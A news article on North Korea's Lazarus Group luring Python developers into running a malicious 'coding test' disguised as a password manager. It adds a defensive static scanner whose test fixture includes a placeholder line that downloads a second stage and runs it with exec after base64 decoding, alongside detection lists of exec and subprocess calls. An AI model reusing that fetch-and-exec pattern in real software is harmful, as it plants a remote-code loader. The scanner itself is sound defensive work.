North Korean Lazarus hackers use fake coding test to infect developers

North Korean state-sponsored threat actor Lazarus Group is refining its long-running fake-job campaign, researchers warn.

Lazarus has been creating fake LinkedIn accounts and posting fake job openings for years. The targets, often developers, are offered attractive packages: high salaries and plenty of perks. Instead of a job, the applicants end up with malware after a few rounds of the “application process”, often delivered through PDF files posing as job descriptions and similar documents.

Cybersecurity researchers at ReversingLabs now report that Lazarus is running the same playbook again, this time targeting Python developers with a fake coding test.

A half-hour “skills test”

The group starts the same way as before, by posing as a recruiter on LinkedIn; in this case the recruiter claims to be hiring for Capital One. The malware is hosted on GitHub, disguised as a password manager project. Once suitable victims have been identified and engaged, they are at some point asked to prove their skills.

The “test” involves downloading and running the password manager, then hunting for bugs in it, and the whole thing must be completed within half an hour. The scammers claim the time limit prevents candidates from cheating; ReversingLabs says it is there to stop victims from inspecting the code closely enough to spot the ruse, and from acting on it, before the malware has already run.

The malware acts as a downloader: it lets the attackers deploy a second-stage payload chosen to fit the compromised environment. ReversingLabs calls the activity the “VMConnect campaign”; it has been active since August 2023, more than a year at the time of writing, and the researchers believe it is still ongoing.
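For a practitioner handed such a “take-home test”, the useful countermeasure is to read the project before running it, ideally inside a disposable VM. The script below is an added example, not code from the article or from the ReversingLabs report. It is a coarse static triage that flags the constructs a staged Python downloader tends to combine: a network import together with dynamic execution, payload decoding or process spawning. The indicator lists, the classification rule and the two sample files are constructed for illustration; the 127.0.0.1 URL in the suspect sample is a placeholder string that is only parsed, never fetched.

```python
"""Static triage of a Python project for downloader-style behaviour.

Added example (not from the article or ReversingLabs). It parses source with
`ast`, so nothing in the scanned project is ever executed. It flags indicators
a staged downloader tends to combine; it does not prove a project is malicious,
and obfuscation (getattr chains, string-built module names) can evade it.
"""
import ast
import os
import tempfile
from dataclasses import dataclass

# Constructed indicator lists (assumptions for this example, not from the report).
NETWORK_MODULES = {"urllib", "requests", "socket", "http", "httpx"}
EXEC_CALLS = {"exec", "eval", "compile", "__import__"}
DECODE_CALLS = {"base64.b64decode", "codecs.decode", "zlib.decompress", "marshal.loads"}
SPAWN_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call", "os.system", "os.popen"}


@dataclass
class Finding:
    path: str
    line: int
    indicator: str  # "<kind>:<name>"


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(path, source):
    """Return the list of Findings for one file's source text."""
    try:
        tree = ast.parse(source, filename=path)
    except SyntaxError as exc:
        return [Finding(path, exc.lineno or 0, "unparseable:source")]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            modules = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            modules = [node.module or ""]
        else:
            modules = []
        for mod in modules:
            if mod.split(".")[0] in NETWORK_MODULES:
                findings.append(Finding(path, node.lineno, f"network-import:{mod}"))
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in EXEC_CALLS:
                findings.append(Finding(path, node.lineno, f"dynamic-exec:{name}"))
            elif name in DECODE_CALLS:
                findings.append(Finding(path, node.lineno, f"decode:{name}"))
            elif name in SPAWN_CALLS:
                findings.append(Finding(path, node.lineno, f"spawn:{name}"))
    return findings


def classify(findings):
    """Constructed rule: network access plus a way to run fetched data is downloader-like."""
    kinds = {f.indicator.split(":", 1)[0] for f in findings}
    if "network-import" in kinds and kinds & {"dynamic-exec", "decode", "spawn"}:
        return "downloader-like"
    return "review" if kinds else "clean"


def scan_project(root):
    """Classify every .py file under root; returns {relative path: verdict}."""
    verdicts = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(".py"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    rel = os.path.relpath(full, root)
                    verdicts[rel] = classify(scan_source(rel, fh.read()))
    return verdicts


# Constructed samples: a benign vault helper and a downloader-style init hook.
SAMPLE_BENIGN = "import json\n\ndef save(vault, path):\n    with open(path, 'w') as f:\n        json.dump(vault, f)\n"
SAMPLE_SUSPECT = (
    "import base64\nimport urllib.request\n\n"
    "def _init():\n"
    "    blob = urllib.request.urlopen('http://127.0.0.1/stage2').read()\n"  # placeholder, never fetched
    "    exec(base64.b64decode(blob))\n"
)


def demo():
    """Write the two samples into a temp project and scan it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "vault.py"), "w") as fh:
            fh.write(SAMPLE_BENIGN)
        with open(os.path.join(root, "setup_hook.py"), "w") as fh:
            fh.write(SAMPLE_SUSPECT)
        return scan_project(root)


if __name__ == "__main__":
    for rel, verdict in sorted(demo().items()):
        print(f"{verdict:16} {rel}")
```

A “downloader-like” verdict is a reason to stop and read the flagged lines, not a conviction; equally, a “clean” result only means the simple patterns were absent. The point is to make the inspection step that the half-hour deadline is designed to squeeze out take a few seconds instead of being skipped.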

North Korean actors typically target developers working on cryptocurrency projects because that access can be turned into stolen funds, which are used to finance the state apparatus and its weapons programme. One of Lazarus’ largest heists netted more than half a billion dollars.

Via BleepingComputer
